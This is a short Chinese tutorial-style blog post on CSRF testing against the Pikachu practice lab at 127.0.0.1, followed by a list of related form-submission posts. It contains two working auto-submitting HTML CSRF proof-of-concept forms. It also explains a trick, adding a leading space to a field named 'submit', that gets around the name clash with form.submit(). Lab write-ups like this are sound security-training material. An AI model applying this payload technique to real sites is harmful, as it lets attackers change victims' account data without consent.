csrf测试name=submit与submit()冲突导致无法自动提交表单的解决方法
pikachu靶场环境中,post的csrf在参数中有一个submit=submit,开始poc如下
<html><body><form action="http://127.0.0.1/vul/csrf/csrfpost/csrf_post_edit.php" method="POST"><input type="hidden" name="sex" value="girl" /><input type="hidden" name="phonenum" value="18656565545" /><input type="hidden" name="add" value="usa" /><input type="hidden" name="email" value="zhangsan@pikachu.com" /><input type="hidden" name="submit" value="submit" /><input type="submit" value="Submit request" /></form><script>document.forms[0].submit();</script></body>
</html>
但是自动提交表单失败,一番搜索后发现是name="submit"这里与submit()冲突了,开始想的是利用url编码,把name="submit"改成name="%73ubmit",burp中发送是可行的,但是实际测试中因为Content-Type: application/x-www-form-urlencoded,把%做了编码,%73ubmit变成了%2573ubmit,最后发现可以在submit前加空格解决,变成name=" submit",最终poc如下
<html><body><form action="http://127.0.0.1/vul/csrf/csrfpost/csrf_post_edit.php" method="POST"><input type="hidden" name="sex" value="girl" /><input type="hidden" name="phonenum" value="18656565545" /><input type="hidden" name="add" value="usa" /><input type="hidden" name="email" value="zhangsan@pikachu.com" /><input type="hidden" name=" submit" value="submit" /><input type="submit" value="Submit request" /></form><script>document.forms[0].submit();</script></body>
</html>
顺便说下,测试过程中发现chrome浏览器在请求的时候不会携带cookie信息了,还没搞清楚是哪条安全策略导致的,最后使用猎豹浏览器测试成功
csrf测试name=submit与submit()冲突导致无法自动提交表单的解决方法相关推荐
- jquery submit()不能提交表单的解决方法
jquery submit()不能提交表单的解决方法 参考文章: (1)jquery submit()不能提交表单的解决方法 (2)https://www.cnblogs.com/war-hzl/p/ ...
- jquery 通过submit()方法 提交表单示例
jquery 通过submit()方法 提交表单示例: 本示例:以用户注册作为例子.使用jquery中的submit()方法实现表单提交. 注:本示例仅提供了对表单的验证,本例只用选用了三个字段作为测 ...
- Html 中表单提交的一些知识总结——防止表单自动提交,以及submit和button提交表单的区别...
转自:http://jackaudrey.blog.163.com/blog/static/1314217882010590041833/ 在页面中有多个input type="text&q ...
- php提交表单时判断 if($_POST[submit])与 if(isset($_POST[submit])) 的区别
if(isset($_POST['submit'])) 它的意思是不是判断是否配置了$_POST['submit'] 这个变量呢?如果有这个变量 在执行其它代码 应该这样用if(isset($_POS ...
- submit()提交表单时,显示警示框
我同事在实现submit()提交表单时,想要页面弹出警示框. 但是折腾了几小时后发现,submit()始终不执行. 她的代码如下: $(document).ready(function(){ $(&q ...
- 提交表单到弹出窗口 Submit a form into a popup
实例目的:一些网站不允许被包含在iframe中(例如paypal standard),为了实现让用户仍然留在本站的目的,下面的实例可供参考. 方法一: HTML的方式 DEMO <form id ...
- js 用submit()方法提交表单,页面闪退问题以及解决方法
1.今天遇到一种情况,js使用submit方法提交表单,怎么都提交不过去,加断点倒跳过去了,主要实现的是这样的一个功能,点击一个按钮触发一个方法,在方法底下再提交表单过去,主要代码如下: <bu ...
- 提交表单 form submit 不跳转实现
第一种方式 $(function() { $("form").submit(function() {return false();}); // 禁用 form 提交,页面不会跳转 ...
- JS--JavaScript提交表单(submit事件)、重置表单、取消默认提交表单(单击按钮、回车)
提交表单 使用< input > 或 < button >标签都可以定义提交按钮,只要将type属性值设置为"submit"即可,而图像按钮则是通过将 &l ...
最新文章
- 软考-信息系统项目管理师-项目变更管理
- 正则表达式判断邮箱、身份证..是否正确
- Echarts笔记-折线图定制(Y轴百分数,鼠标移动显示百分数,显示X轴,Y轴值)
- SSM整合——实现图书的查询功能
- 算法导论 思考题12-1
- Linux环境下虚拟化之KVM常用命令
- java虚拟机的heap监狱_JVM垃圾回收--垃圾收集器总结
- 微信小程序模板全行整理合集
- 机器人弹性伸缩算法-专利技术交底书
- ns手柄pc驱动_功能特点可以打满屏!北通宙斯白金版无线游戏手柄体验
- 【SpringBoot项目No qualifying bean of type ‘×××Mapper‘ available:的错误解决】
- 为什么禁止超过三张表 join,原理是什么?
- 一文搭建自己博客/文档系统:搭建,自动编译和部署,域名,HTTPS,备案等
- C++中使用placement new
- D1 哪吒开发板 上电记录
- 湖南发现外星智慧创造人类证据(图)
- B2B订货商城平台到底有什么用?
- 英语字母c的语言教案,[小班英语教案认识字母]幼儿园小班英语教案:字母C.doc...
- python re正则表达式提取含有某些关键词的句子,findall()查找含有关键词的句子
- android7.1.2彩蛋,在Android 7.0牛轧糖中解锁秘密猫收集复活节彩蛋 | MOS86